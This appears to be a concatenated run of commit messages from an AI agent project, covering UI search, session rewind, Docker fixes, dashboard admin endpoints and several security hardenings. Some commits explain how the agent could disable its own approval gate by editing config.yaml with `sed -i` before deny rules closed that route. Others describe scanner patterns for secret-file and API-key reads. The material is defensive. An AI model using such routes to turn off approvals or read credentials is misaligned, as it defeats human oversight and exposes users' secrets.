A cross-language parity test pins the exact scores.
- `_prompt_model_selection` (the canonical picker across the model flows)
and the custom-provider model list pass `searchable=True`.
- Split `_decode_menu_key` out of `read_menu_key` so the search loop can
peek the raw key (catch `/`) before nav decoding.
- ESC during active search now clears the query (restores the full list)
so a no-match filter can't strand the user; printable-key capture is
restricted to ASCII to avoid Latin-1 mojibake.
- Update two setup-menu tests whose mock signatures predate the new
`searchable` kwarg; add ranked-scorer + parity + state-machine tests.
Pure, refactor-independent helpers for type-to-filter search in the
curses single-/radio-select menus: subsequence matching, filtered-index
mapping, cursor reconciliation, scroll clamping, and an active-search
key handler, plus unit tests.
Salvaged from #22758 (the curses event loop was since refactored into a
shared driver on main, so the integration is rebuilt in a follow-up
commit; these pure helpers and their tests carry over unchanged).
Adds fuzzy subsequence matching with quality ranking to the model
pickers, replacing the WebUI's exact-substring filter and giving the
TUI a search where it previously had none.
- New fuzzy scorer (ui-tui/src/lib/fuzzy.ts + an identical copy at
web/src/lib/fuzzy.ts, since the two are separate TS packages with no
shared module). Matches a query as an ordered subsequence (so `g4o`
matches `gpt-4o`), scores by quality (exact > prefix > word-boundary >
contiguous > scattered) and returns matched character positions for
highlighting. Multi-token AND semantics (`clad snnt` -> claude-sonnet).
15 vitest tests cover the algorithm.
- WebUI ModelPickerDialog: ranked fuzzy filter on providers + models;
matched characters in model rows are highlighted via <mark>.
- TUI modelPicker: type-to-filter on the provider and model stages with
live ranking. Backspace edits the filter, Ctrl+U clears it, Esc clears
a non-empty filter before navigating back. Persist-global / disconnect
shortcuts moved from g/d to Ctrl+G / Ctrl+D so letters feed the filter.
Closes#30849
* fix(file_tools): block agent writes to ~/.hermes/config.yaml to prevent silent approval bypass
* fix(approval): pair terminal-side gate for ~/.hermes/config.yaml writes
Subway2023's #14639 blocks write_file/patch to ~/.hermes/config.yaml, but
the terminal side was only partially paired: echo>/tee/cp/mv to config.yaml
already tripped the project-config pattern, while `sed -i` and direct edits
slipped through with auto-approve. An unpaired write_file deny is theater per
SECURITY.md — the agent could flip approvals.mode=off via `sed -i` and the
mtime-keyed config cache reloads it mid-session.
config.yaml IS the security policy (approvals.mode/yolo/permanent allowlist
live there), so it warrants real pairing, not a half-door. Add a
_HERMES_CONFIG_PATH fragment mirroring _HERMES_ENV_PATH, fold it into
_SENSITIVE_WRITE_TARGET (covers tee/>/>>/cp/mv), and add sed -i coverage for
both config.yaml and .env. Pins 9 regression tests including no-regression
guards (reads pass, /tmp writes pass).
Co-authored-by: sbw2025 <subw3@mail2.sysu.edu.cn>
* chore(release): map Subway2023 for PR #14639 salvage
* docs: expand quickstart Skills section
The Skills section was two bare commands with no framing — it never said
what a skill is, how skills load, or what the install slug means. Expanded
to explain the concept, the bundled catalog, install/browse/use flow, and
slash-command activation. Removed the inaccurate /skills chat-command hint
(skills become individual /<name> commands; hermes skills is the CLI verb).
---------
Co-authored-by: sbw2025 <subw3@mail2.sysu.edu.cn>
Port PR #29365's tool-surface contract test: terminal/file/execute_code
already honor TERMINAL_CWD (out of scope for the resolver cluster). Pinning
the behavior makes the supersession of #29365 airtight and guards against a
future refactor silently regressing the workspace contract.
Cover the two new hardening behaviors that were unpinned: whitespace-only
TERMINAL_CWD falling through to getcwd/None, and OSError from the getcwd
fallback arm propagating to the build_environment_hints try/except guard.
Do not treat lack of application-level SimpleX events as a stale WebSocket. The websockets client already uses protocol ping/pong for connection liveness, so quiet but healthy connections should not be closed by the health monitor.
* fix(file_tools): block agent writes to ~/.hermes/config.yaml to prevent silent approval bypass
* fix(approval): pair terminal-side gate for ~/.hermes/config.yaml writes
Subway2023's #14639 blocks write_file/patch to ~/.hermes/config.yaml, but
the terminal side was only partially paired: echo>/tee/cp/mv to config.yaml
already tripped the project-config pattern, while `sed -i` and direct edits
slipped through with auto-approve. An unpaired write_file deny is theater per
SECURITY.md — the agent could flip approvals.mode=off via `sed -i` and the
mtime-keyed config cache reloads it mid-session.
config.yaml IS the security policy (approvals.mode/yolo/permanent allowlist
live there), so it warrants real pairing, not a half-door. Add a
_HERMES_CONFIG_PATH fragment mirroring _HERMES_ENV_PATH, fold it into
_SENSITIVE_WRITE_TARGET (covers tee/>/>>/cp/mv), and add sed -i coverage for
both config.yaml and .env. Pins 9 regression tests including no-regression
guards (reads pass, /tmp writes pass).
Co-authored-by: sbw2025 <subw3@mail2.sysu.edu.cn>
* chore(release): map Subway2023 for PR #14639 salvage
* fix(models): add gemini-3.5-flash to Gemini OAuth + API-key pickers
#34581 swapped gemini-3-flash-preview -> gemini-3.5-flash in the
OpenRouter and Nous lists but missed the curated Gemini catalogs, so
the Google OAuth (google-gemini-cli) picker still offered the retired
gemini-3-flash-preview slug and gemini-3.5-flash was unselectable.
Per Google's docs gemini-3-flash-preview was renamed to gemini-3.5-flash
and is served via Cloud Code Assist, so this completes the rename for:
- google-gemini-cli (OAuth/Code Assist) picker
- gemini (API-key) picker
- gemini provider default_aux_model
copilot keeps gemini-3-flash-preview (separate backend, own slug).
---------
Co-authored-by: sbw2025 <subw3@mail2.sysu.edu.cn>
M3 is 1M context, but pre-catalog builds resolved it via the generic
'minimax' catch-all (204,800) and persisted that to the context-length
cache. Step 1 of get_model_context_length returned the cached value
directly before reaching the 'minimax-m3' (1M) catalog entry, so users
who first probed M3 on an older build were stuck at 204K forever (e.g.
/new in the Telegram gateway showing 'Context: 204K tokens (detected)').
Mirror the existing Kimi/Codex stale-cache guards: when a cached entry
for a minimax-m3 slug is <= 204,800, drop it and re-resolve. M2.x slugs
(correctly 204,800) are untouched since they don't match the M3 name.
os.fchmod is Unix-only; the Windows os module has no fchmod (only
chmod). Passing mode= (e.g. 0o600 when saving the Hindsight config
during `hermes memory setup`) crashed on Windows with:
AttributeError: module 'os' has no attribute 'fchmod'
Guard the fchmod fast-path with hasattr(os, "fchmod"). Skipping it on
Windows is safe: mkstemp already creates the temp file as 0o600, and
the existing post-replace os.chmod(real_path, mode) — already wrapped
in try/except — applies the final mode durably (as far as Windows
honors it).
Adds regression tests: one simulating a Windows os module without
fchmod (must not raise), and one asserting the durable 0o600 mode on
POSIX.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
When the TUI exits via Ctrl+C, SIGTERM/SIGHUP, or a crash, prompt_toolkit's
teardown can be bypassed, leaving DEC 1004 (focus reporting) and 1000/1002/1003
(mouse tracking) enabled. The terminal then emits raw ESC[I/ESC[O focus events
and fragmented SGR mouse reports as visible text in whatever runs next in the
same tab.
_run_cleanup() — the once-only cleanup that runs on every catchable exit path
(atexit-registered + called on the normal/EOF/interrupt exit) — now emits
_TERMINAL_INPUT_MODE_RESET_SEQ (the same disable sequence the in-session leak
recovery already uses) as its FIRST step, so the terminal is usable immediately
on Ctrl+C and a later teardown step raising can't skip it.
The reset is gated on a new _tui_input_modes_active flag (set right before
app.run(), cleared once the modes are disabled) so non-TUI one-shot CLI runs —
which share _run_cleanup via atexit — don't emit codes for modes they never
enabled. Writes to sys.stdout when it's the terminal, else falls back to
/dev/tty. SIGKILL is uncatchable and the kanban worker's os._exit(0) bypasses
atexit, but both are non-TTY/non-TUI so there is nothing to reset there.
Adds tests/cli/test_tui_terminal_reset_on_exit.py (9): emits on a TTY when the
TUI ran, no-ops when the TUI never ran, /dev/tty fallback when stdout is
redirected, no-op when neither is available, swallows stdout errors, flag set
and cleared, and wired into _run_cleanup as the first step even when a later
step raises.
Fixes#36823
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Subway2023's #14639 blocks write_file/patch to ~/.hermes/config.yaml, but
the terminal side was only partially paired: echo>/tee/cp/mv to config.yaml
already tripped the project-config pattern, while `sed -i` and direct edits
slipped through with auto-approve. An unpaired write_file deny is theater per
SECURITY.md — the agent could flip approvals.mode=off via `sed -i` and the
mtime-keyed config cache reloads it mid-session.
config.yaml IS the security policy (approvals.mode/yolo/permanent allowlist
live there), so it warrants real pairing, not a half-door. Add a
_HERMES_CONFIG_PATH fragment mirroring _HERMES_ENV_PATH, fold it into
_SENSITIVE_WRITE_TARGET (covers tee/>/>>/cp/mv), and add sed -i coverage for
both config.yaml and .env. Pins 9 regression tests including no-regression
guards (reads pass, /tmp writes pass).
Co-authored-by: sbw2025 <subw3@mail2.sysu.edu.cn>
A stream that drops mid-response after tokens are delivered (peer-closed
connection, stale-stream reconnect) is converted into a synthetic
finish_reason="length" stub. The conversation loop treated that network
stall as a max-output-tokens truncation: when the dropped content was a
tool call it retried exactly once, then hard-failed with "Response
truncated due to output length limit" — even on large-output models that
never hit any cap (e.g. Opus).
- Tool-call truncation now retries up to 3 times (was 1) with a
progressive max_tokens boost, and is stub-aware: a PARTIAL_STREAM_STUB_ID
stall prints "Stream interrupted mid tool-call — retrying (n/3)" instead
of the false "model hit max output tokens", and the give-up message
distinguishes a network drop from a real truncation.
- Length-continuation retries preserve the original request's output cap
as a floor, so a high provider/model default isn't silently downshifted
to 8K/12K on retry.
- Added _requested_output_cap_from_api_kwargs() helper.
Tests: stub-stall mid-tool-call recovery within 3 retries; continuation
preserves a large provider-default output cap.
Fixes#26425. Salvages the substance of #26427 (cap floor) and #9525
(retry bump), adapted to the post-refactor conversation_loop.py which
handles all three api_modes uniformly.
Co-authored-by: LeonSGP43 <cine.dreamer.one@gmail.com>
Co-authored-by: ygd58 <ygd58@users.noreply.github.com>
* feat(dashboard): backend API for MCP, pairing, webhooks, credential pool, memory, gateway lifecycle
Adds REST endpoints so a remote admin can manage these without CLI access:
- MCP servers: list/add/remove/test (config.yaml parity with hermes mcp)
- Pairing: list/approve/revoke/clear-pending messaging codes
- Webhooks: list/subscribe/remove (hot-reloaded JSON store)
- Credential pool: list/add/remove rotation keys (via CredentialPool API)
- Memory provider: status/select/disable/reset
- Gateway lifecycle: start/stop (restart+update already existed)
Secrets redacted on read; usable values only reach the agent at session start.
All endpoints sit behind the existing dashboard auth gate.
* feat(dashboard): backend API for ops + skills hub
- Ops actions (spawned, log-tailed via /api/actions): doctor, security audit,
backup, import, checkpoints prune
- Ops reads (structured JSON): hooks list + allowlist status, checkpoints list
with per-session size
- Skills hub actions (spawned): install / uninstall / update
- Registers new action log files for all spawn-based endpoints
All gated by the existing dashboard auth middleware.
* feat(dashboard): admin pages for MCP, pairing, webhooks, and system ops
Adds four new dashboard pages + nav entries so a remote admin can manage
Hermes without CLI access:
- MCP: list/add/remove/test MCP servers
- Webhooks: list/create/delete subscriptions (one-time secret reveal)
- Pairing: approve/revoke/clear messaging pairing codes
- System: gateway start/stop/restart, memory provider + reset, credential
pool add/remove, ops (doctor/audit/backup/import/skills update) with a
live action-log viewer, checkpoints prune, shell-hooks status
api.ts: client methods + types for all new endpoints.
App.tsx: routes + sidebar nav (plain labels, no i18n key required).
Verified: tsc -b clean, production build succeeds, new pages lint clean,
zero new eslint errors in App.tsx.
* test(dashboard): cover admin API endpoints
20 tests across MCP, credential pool, memory, pairing, webhooks, ops, plus
an auth-gate parametrize that asserts every admin endpoint requires the
session token. Asserts request contract + CLI-config parity, not catalog
values (per the no-change-detector-tests rule).
* docs(dashboard): document MCP, Webhooks, Pairing, and System admin pages
Adds Pages sections for the four new admin tabs and an Admin-endpoints table
to the REST API reference. Updates the page description to reflect the
dashboard's expanded role as a full administration panel.
* feat(install): --no-skills flag for blank-slate default profile
Add an install-time --no-skills flag so the default ~/.hermes profile can
be created with zero bundled skills, matching what
`hermes profile create --no-skills` already does for named profiles.
The flag writes $HERMES_HOME/.no-bundled-skills and skips the install-time
seed. sync_skills() now honors that marker with an early return
(skipped_opt_out=True), so neither the installer, a later `hermes update`,
nor a direct sync re-injects bundled skills into a profile that opted out.
Previously the marker was only checked by seed_profile_skills() (named
profiles); the default profile had no opt-out and `hermes update` would
re-seed it every time.
Tests: TestNoBundledSkillsOptOut covers marker-present (no-op) and
marker-absent (normal seed) paths.
* feat(skills): hermes skills opt-out / opt-in for existing profiles
Adds an interactive counterpart to the install-time --no-skills flag so
an already-installed profile (default or named) can toggle the
.no-bundled-skills marker without reinstalling.
- `hermes skills opt-out` writes the marker (stop future seeding). Safe
by default: nothing on disk is touched.
- `hermes skills opt-out --remove` ALSO deletes already-present bundled
skills, but ONLY ones that are manifest-tracked AND byte-identical to
their origin hash. User-edited bundled skills, hub-installed skills, and
hand-written skills are never removed. Previews + confirms before
deleting (--yes to skip).
- `hermes skills opt-in [--sync]` removes the marker and optionally
re-seeds immediately.
Core logic lives in tools/skills_sync.py (set_bundled_skills_opt_out,
is_bundled_skills_opt_out, remove_pristine_bundled_skills) reusing the
existing manifest origin-hash machinery for the safety check.
Tests: TestOptOutToggleAndRemove covers marker toggle idempotency and
proves user-modified + non-bundled skills survive --remove.
* docs: blank-slate skills — install --no-skills + opt-out/opt-in
- features/skills.md: new 'Starting with a blank slate' section covering
the install flag, profile-create flag, and runtime opt-out/opt-in, with
a safe-by-default note.
- reference/cli-commands.md: document the new skills opt-out / opt-in
subcommands + examples.
- reference/profile-commands.md: fix the marker filename (was .no-skills,
actually .no-bundled-skills) and cross-link the runtime commands.
Validated with a full docusaurus build (exit 0); the three edited pages
compile clean with no new warnings.
Two related changes to the skill curator:
1. Built-in pruning. New curator.prune_builtins config (default on) lets the
curator archive bundled built-in skills after the inactivity period, not
just agent-created ones. A .curator_suppressed list tells the update-time
re-seeder (tools/skills_sync) to leave pruned built-ins archived, so the
prune is durable across `hermes update`. Built-ins are seeded with a
baseline record on first sight, so the inactivity clock starts at upgrade
time -- no mass-prune on the first run. Hub-installed skills are never
pruned regardless of the flag. Restoring a built-in clears its suppression.
2. Usage tracking for all skills. Telemetry (view/use/patch) was wrongly gated
behind curation-eligibility, so built-ins were tracked only when prunable
and hub skills never. Telemetry is observability and is now decoupled from
curation: every skill accrues usage counts regardless of provenance, while
lifecycle mutators (set_state/set_pinned/mark_agent_created) stay
curation-gated. New usage_report() + provenance() expose all skills with an
agent/bundled/hub tag.
Gateway /undo was wired into every platform but still ran the old
single-turn hard-truncate. Now it matches the CLI/TUI: /undo [N] backs
up N user turns (default 1, clamps to oldest), soft-deletes the
truncated rows on disk (active=0, kept for audit, hidden from re-prompts
and search) via SessionDB.rewind_to_message, evicts the cached agent so
the next turn rebuilds from the active-only transcript (the gateway's
equivalent of the CLI's in-place history surgery + memory invalidation),
and echoes the backed-up message text so the user can copy/edit and
resend — platforms have no editable composer to prefill.
- gateway/session.py: SessionStore.rewind_session(session_id, n) wraps
the soft-delete primitive; load_transcript already returns active-only
- gateway/run.py: _handle_undo_command parses [N], calls rewind_session,
evicts the agent, echoes target text; confirm-prompt detail is count-aware
- locales: undo.removed gains {turns}; new undo.invalid_count, all 16 langs
- tests: tests/gateway/test_undo_rewind_session.py (6 cases)
The skill security scanner blocked legitimate community skills on three
intrinsic false-positive patterns:
- read_secrets_file matched `cat > file.env <<` heredocs (writing the
user's own keys into their own local .env), not just `cat file.env`
reads. Exclude output redirections.
- allowed-tools frontmatter is REQUIRED by the agent-skill spec; every
compliant skill declares it. Drop from HIGH privilege_escalation to a
LOW informational finding so it no longer drives the verdict.
- python_os_environ flagged `os.environ.get("CONFIG_VAR")` config reads
as HIGH exfiltration. Exempt non-secret `.get()` reads; add a dedicated
CRITICAL python_environ_get_secret pattern so secret-named reads
(OPENAI_API_KEY etc.) are still caught.
Also: scan_skill() now honors a skill-provided .skillignore / .clawhubignore
(gitignore-style) so dev/docs artifacts shipped in a skill root are excluded
from both structural checks and pattern scanning. SKILL.md is never ignorable.
80 tests pass (64 existing + 16 new).
The setup-mode chooser showed two bare labels ('Quick Setup (Nous
Portal) — OAuth login, model & messaging' / 'Full setup — configure
everything') that didn't explain what Quick Setup actually is. Expand
both labels inline so each choice line carries a concise explanation:
Quick Setup (Nous Portal) — free OAuth login, no API keys, model + tools
Full setup — configure every provider, tool & option yourself (bring your own keys)
Single-file change to the choice labels; no new plumbing.
Two pre-existing failures on main, unrelated to each other:
- test_model_catalog: website/static/api/model-catalog.json was stale vs
_PROVIDER_MODELS — minimax/minimax-m2.7 was renamed to minimax/minimax-m3
without regenerating the committed manifest. Ran scripts/build_model_catalog.py.
- test_gui_command: the macOS relaunchable-signing fixup
(_desktop_macos_relaunchable_fixup) makes two subprocess.run calls (xattr +
codesign) on darwin before launch. The two darwin GUI tests set
sys.platform='darwin' and mock subprocess.run with a 2-element side_effect
(pack + launch), so the fixup's calls drained the iterator -> StopIteration.
Mock out the fixup in those two tests so the subprocess accounting stays
focused on pack/launch.
The on_session_switch fan-out passed rewound=rewound unconditionally,
injecting rewound=False into every provider's **kwargs on the common
/resume, /branch, /new, and compression paths. Providers that capture
extra kwargs into an 'extra' dict (and the exact-dict-equality tests
guarding them) broke. Forward rewound only when truthy; /undo sets it
explicitly, everyone else stays clean.
Extends the existing /undo command from a single in-memory exchange
removal into a full rewind: back up N user turns (default 1), soft-delete
the truncated rows in SessionDB (active=0, kept for audit, hidden from
re-prompts and search), notify memory providers, and prefill the composer
with the backed-up message text for editing — CLI and TUI.
Reuses the SessionDB rewind primitives, the on_session_switch(rewound=True)
memory hook, and the TUI command.dispatch prefill payload from SaguaroDev's
#21910 work, wired to /undo [N] instead of a separate /rewind picker.
- cli.py: undo_last(n, prefill) — in-memory truncate + SQLite soft-delete
+ agent surgery (system-prompt invalidate, flush-index reset) + memory
notify + editable buffer prefill; /undo dispatch parses optional count;
checkpoint-rollback caller passes prefill=False
- tui_gateway/server.py: command.dispatch undo branch (was rewind) parses
count, picks Nth-from-last user turn, clamps to oldest
- commands.py: /undo gains [N] args_hint
- tests: rename + expand TUI suite (multi-turn, clamp, invalid-count)
- release.py: AUTHOR_MAP entry for SaguaroDev
Co-authored-by: SaguaroDev <74339271+SaguaroDev@users.noreply.github.com>
Adds the TUI half of the /rewind feature so the Ink terminal UI gets
the same affordance as the prompt_toolkit CLI.
Python side (tui_gateway/server.py):
- /rewind added to _PENDING_INPUT_COMMANDS so slash.exec rejects it
and the TUI falls through to command.dispatch (the only path with
access to live session state + memory hooks).
- New command.dispatch branch for name == "rewind":
v1 auto-picks the most recent user turn (Claude-Code-style single-
step undo), calls SessionDB.rewind_to_message, refreshes the
in-memory history, fires _memory_manager.on_session_switch with
rewound=True, and returns the new "prefill" payload.
- A dedicated picker overlay (multi-step rewind) is tracked as a
follow-up to #21910.
TS side (ui-tui/src/):
- New "prefill" variant on CommandDispatchResponse + asCommandDispatch
validator. Mirrors "send" but does NOT auto-submit; the client drops
the message into the composer for editing.
- createSlashHandler renders the optional notice via sys() and calls
ctx.composer.setInput(d.message), letting the user edit-and-resubmit
the rewound turn — the core UX promised by the issue.
Tests:
- 7 new tui_gateway tests covering prefill payload shape, in-memory
history truncation, DB soft-delete, memory-provider notification
(rewound=True), busy-session refusal, missing-session error, and
registry placement in _PENDING_INPUT_COMMANDS.
- Extended asCommandDispatch vitest covering the new prefill variant
(with + without notice, and rejection of malformed payloads).
Out of scope for v1 (tracked as #21910 follow-up):
- Dedicated picker overlay in Ink (the multi-step rewind UI). v1 auto-
picks the most recent user turn, matching the most common case.
- Gateway platforms (Telegram, Discord, etc.) — issue scopes v1 to
CLI + TUI only.
Self-review of the code-block masking fix: the cleanup path ran
media_pattern.sub('') over the _mask_protected_spans() copy of the text and
assigned that back to 'cleaned', so whenever a real MEDIA: tag was delivered
(if media: branch), every fenced code block / inline code / blockquote in the
reply was blanked to whitespace in the user-visible text.
Now mask only a length-equal copy of 'cleaned' to locate the real tag spans,
then delete those spans from the unmasked 'cleaned' — masking is a locator,
not a text rewrite. Protected spans survive verbatim. Strengthens the existing
mixed-code test (it only asserted 'Done.' survived, not the code block) and
adds an inline-code-survives regression test. Both fail on the old sub-based
code and pass now.
extract_media() scanned the full response text without distinguishing
live delivery tags from example paths in fenced code blocks, inline code
spans, and blockquotes. This caused false positives where the agent's
explanation of MEDIA: syntax (or tool output containing example paths)
was stripped from user-visible text and the path was added to the media
delivery list.
Added _mask_protected_spans() helper that replaces protected regions
with equal-length whitespace before regex matching, preserving match
offsets. The helper skips backtick-quoted paths in MEDIA: tags to
maintain existing path extraction behavior.
Fixes#35695
Self-review of #34375 fix: the cleanup path ran media_pattern.sub('') over
the JSON-masked copy of the text, which baked the masking spaces into the
user-visible 'cleaned' string — a serialized tool result like
{"old":"MEDIA:/x.png"} came back as {"old":" "}.
Now mask only a length-equal copy of 'cleaned' to locate the real tag spans,
then delete those spans from the unmasked 'cleaned'. Real tags are stripped;
JSON-embedded MEDIA: text reads back verbatim. Masking 'cleaned' (not the
original 'content') keeps offsets valid after the [[audio_as_voice]] /
[[as_document]] directives are removed. Adds two cleaned-text regression tests.
Serialized tool results frequently embed a prior reply's text, e.g.
{"result": "MEDIA:/path/stale.png"}. The bare-path branch of
MEDIA_TAG_CLEANUP_RE matched these and re-delivered stale files (#34375).
Adds BasePlatformAdapter._mask_json_string_media, which blanks (offset-
preserving) only MEDIA:<bare-path> tokens that sit inside a JSON value-
context string (opened by : , { or [). Legitimate tags at line start,
after prose, indented, MEDIA:"quoted" form, and two-line TTS output are
all left untouched.
Reworked from the approach in #34388 (a line-start regex anchor), which
no longer applied to current main and regressed same-line/indented tags.
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Adds nicsequenzy@gmail.com -> polnikale to AUTHOR_MAP so the
check-attribution gate passes for the Playwright headless_shell browser
discovery fix (#35717).
* feat(desktop): drop files anywhere in the chat area
File drops were only wired to the composer input. Add a reusable
useFileDropZone hook (enter/leave depth counting + capture-phase reset so
the affordance clears even when the composer claims the drop) and a
pointer-events-none ChatDropOverlay, wired onto the conversation viewport.
Drops funnel through the existing onAttachDroppedItems; composer drops keep
their own inline-ref behavior.
* fix(desktop): chat-area drops insert inline @file refs, not attachment cards
Match the composer-input drop behavior — funnel dropped paths through
droppedFileInlineRef + the composer insert bus so they render as inline
ref chips instead of attachment cards.
* fix(desktop): don't render bare file paths as tool images (404)
vision_analyze reports its input image as a local filesystem path, which
toolImageUrl handed straight to <img src>. In the renderer that resolves
against the dev-server origin and 404s. Restrict inline tool images to
fetchable sources (data: URLs and remote http(s)); bare paths now fall
back to the tool's codicon.
When an unauthenticated SPA fetch hit a gated /api/* endpoint (e.g.
GET /api/analytics/models?days=30 fired from ModelsPage on mount or
after a session expiry), the gated middleware stamped the request's
own path into next= on the 401 envelope's login_url. The SPA's global
401 handler in web/src/lib/api.ts full-page-navigated to that URL,
the PKCE cookie carried the encoded /api/* value through the OAuth
round trip to Portal, and /auth/callback's _validate_post_login_target
accepted it as same-origin and redirected the user to the raw JSON
endpoint instead of the dashboard.
Symptom Ben reported: after the OAuth screen he kept landing on
$DOMAIN/api/analytics/models?days=30 (raw JSON) rather than /models.
The bug was deterministic per page — whichever /api/* call ModelsPage,
AnalyticsPage, or SessionsPage fired first owned the redirect race.
Fix: both validators now reject /api/* targets in addition to the
existing /login, /auth/, /api/auth/ exclusions:
- _safe_next_target in middleware.py drops the value before it ever
enters login_url, so the SPA's 401 handler navigates to a bare
/login (which the SPA itself can return-from via its own
sessionStorage["hermes.lastLocation"] fallback that was already
saving the actual browser location).
- _validate_post_login_target in routes.py drops it as second-line
defence at the callback boundary, so a legacy cookie, a regressed
middleware, or an attacker-crafted /auth/login?next=/api/... value
can't smuggle the redirect through. Either layer alone is enough;
pairing them means a regression in one is caught by the other.
The match is anchored: ``decoded == "/api"`` or
``decoded.startswith("/api/")``. SPA route lookalikes like /apidocs
or /api-keys remain valid landing targets — tests pin that.
Test additions in test_dashboard_auth_401_reauth.py:
- TestApi401Envelope: rewrote test_login_url_carries_next_for_deep_
api_path (which asserted the pre-fix behaviour) as
test_login_url_drops_next_for_deep_api_path, plus added the
specific analytics-models repro case from Ben's report.
- TestNextSameOriginValidation: rejects-api-paths + does-not-reject-
api-prefix-lookalikes (covers /apidocs, /api-keys).
- TestAuthCallbackNext: end-to-end test_callback_with_api_next_
lands_at_root drives /auth/login?next=/api/... through to the
callback and asserts the user lands at "/", not the API URL.
- TestValidatePostLoginTarget: new class covering the callback-side
validator directly, including the URL-encoded ``%2Fapi%2F...``
form the PKCE cookie actually carries.
Mutation-tested: reverting both validators causes exactly the 5 new
or rewritten /api/*-related assertions to fail (each fix layer is
independently tested), while the 31 other assertions in the file
remain green. Full tests/hermes_cli/ suite (288 files, 5,938 tests)
passes with the fix applied.
The desktop rename dialog sent PATCH /api/sessions/{id}, but the backend
only defined GET and DELETE for that path — FastAPI returned 405 Method
Not Allowed, surfaced to the user as "Rename failed". Add the PATCH route
backed by SessionDB.set_session_title (handles sanitization, uniqueness,
and clearing the title when empty).
Also fix a misleading notification: any 405 was summarized as an unrelated
"does not support that audio endpoint" message. Make it a generic 405 hint.
The targeted data-volume chown in stage2-hook.sh only covers hermes-owned
*subdirectories*; loose state files living directly under $HERMES_HOME
(auth.json, state.db, gateway.lock, gateway_state.json, …) are missed.
When created or rewritten by `docker exec <container> hermes …` (root
unless `-u` is passed) they land root-owned, and the unprivileged hermes
runtime then hits PermissionError on next startup, producing a gateway
restart loop.
Fix: reset ownership of an explicit allowlist of hermes-owned top-level
files on every boot. The list mirrors the top-level file entries of
hermes_cli.profile_distribution.USER_OWNED_EXCLUDE plus the runtime lock
files.
This uses a targeted allowlist rather than the originally-proposed blanket
`find $HERMES_HOME -maxdepth 1 -user root` sweep, preserving the
targeted-ownership contract from #19788 / PR #19795: a bind-mounted
$HERMES_HOME may contain host-owned files Hermes does not manage, and
those must never be chowned. Verified end-to-end: allowlisted root-owned
files are reset to hermes on restart while a non-allowlisted host file
keeps its root ownership.
Co-authored-by: x1am1 <2663402852@qq.com>
Shiki's github-light-default colors comments #6e7781 (~4.2:1 on the code
card background), which is borderline unreadable at the 11px code font
size — and worst for shell snippets, where a single `#` turns the rest
of the line into one long comment span. Remap light-mode comments to
GitHub's darker muted gray (#57606a, ~6.4:1) via per-theme
colorReplacements. Dark mode (~6.1:1) reads fine and is left untouched.
s6-overlay images (e.g. hermes-agent:latest) use /init as PID 1 and exec
/run/s6/basedir/bin/init during stage0 startup. The Docker terminal backend
unconditionally added Docker --init and mounted /run as noexec, which broke
those images in two ways: --init created a second competing PID-1 init, and
the noexec /run made s6 stage0 fail with "exec: /run/s6/basedir/bin/init:
Permission denied" (exit 126), so the container died and terminal commands
reported a generic "container is not running" error.
Detect images whose entrypoint is /init via 'docker image inspect' and, for
those images only, skip Docker --init and mount /run with exec. All other
images keep the hardened --init + noexec defaults. Detection is best-effort:
any inspect failure falls back to the safe defaults.
#34192 reports Hostinger's 'Hermes WebUI' catalog crashes on startup
with:
/usr/bin/tini: No such file or directory
The image moved from tini to s6-overlay as PID 1 (/init) earlier in
2026. Orchestration templates that still pin /usr/bin/tini as the
entrypoint \u2014 like the Hostinger Hermes WebUI catalog \u2014 have no
binary to exec and the container crashes immediately.
Hermes has no control over the Hostinger catalog template, but we can
make the image backward-compatible by symlinking /usr/bin/tini -> /init
during the s6-overlay install step. External wrappers that exec
/usr/bin/tini will land on the same s6-overlay reaper they would have
landed on if they'd used the canonical /init entrypoint.
The image's own ENTRYPOINT continues to be /init verbatim \u2014 the shim
is purely for legacy external wrappers, not for the image's own
runtime path. Once affected catalogs are updated, the symlink can be
removed.
Other issues #34192 raises that are NOT addressed by this PR:
* Problem #2 (UID 1024 vs 10000 mismatch): already fixed by #33148
(S6_KEEP_ENV=1) and #32412 (with-contenv shebangs). The Hostinger
template likely needs to update its env-var propagation.
* Problem #3 (incompatible session formats): RFC for pluggable
SessionDB is tracked in #23717.
* Problem #4 (Telegram polling conflict): an operations problem on
Hostinger's side, not in this codebase.
This PR is scoped to the one issue that can be fixed inside
Dockerfile: the missing /usr/bin/tini binary.
Tests (3 in test_dockerfile_tini_compat_shim.py):
- test_tini_compat_symlink_present
Guard: the symlink line must exist in Dockerfile.
- test_tini_compat_comment_explains_why
The #34192 anchor comment must be present so future readers know
why the shim is there (avoid accidental removal).
- test_entrypoint_still_init_not_tini
Sanity check: ENTRYPOINT remains /init (s6-overlay). The shim is
only for external wrappers.
Refs: #34192
Partial fix: addresses the immediate tini-binary crash. Catalog-side
fixes still needed by Hostinger for the UID and session-format
problems documented in the issue.
Co-authored-by: Cursor <cursoragent@cursor.com>
Fixes#34107. When Hermes runs in Docker with HERMES_UID=1000 /
HERMES_GID=911, the entrypoint chowns the top-level HERMES_HOME once
at startup — but subdirectories created at runtime by
ensure_hermes_home() (especially for profile namespaces under
profiles/<name>/ spawned by kanban workers) were landing as root:root
and blocking subsequent uid-mapped worker invocations with:
PermissionError: [Errno 13] Permission denied:
'/opt/data/profiles/charles/logs/curator'
Fix: add _resolve_hermes_uid_gid + _chown_to_hermes_uid helpers that
read the env vars and apply chown after mkdir. Invoke from _secure_dir
which already runs after every directory creation in the home-init path,
so all newly-created subdirs (including the profile namespaces) get the
right ownership.
Safety properties:
- No-op when HERMES_UID/HERMES_GID unset (the dominant non-Docker path)
- No-op on Windows (os.chown doesn't exist; AttributeError swallowed)
- No-op when running as non-root (EPERM swallowed — the entrypoint's
startup chown -R picks it up on next restart, and in most cases the
dir was already correctly-owned by the calling user)
- Uses -1 sentinel for missing field so only the set value applies
- Empty-string env vars treated as unset
Adds 14 tests across:
- TestResolveHermesUidGid (7) — env-var parsing
- TestChownToHermesUid (5) — chown helper invariants
- TestSecureDirChown (2) — end-to-end through _secure_dir
Co-authored-by: Cursor <cursoragent@cursor.com>
Add MiniMax-M3 to the minimax, minimax-oauth, and minimax-cn curated
lists (these are hardcoded — the native Anthropic-format endpoint has no
/v1/models listing and the providers aren't in _MODELS_DEV_PREFERRED, so
new models don't auto-pull). Add a DEFAULT_CONTEXT_LENGTHS key
'minimax-m3' -> 1,000,000 so M3 resolves to its 1M context on every
surface (native ID + OpenRouter/Nous slug) via longest-key-first
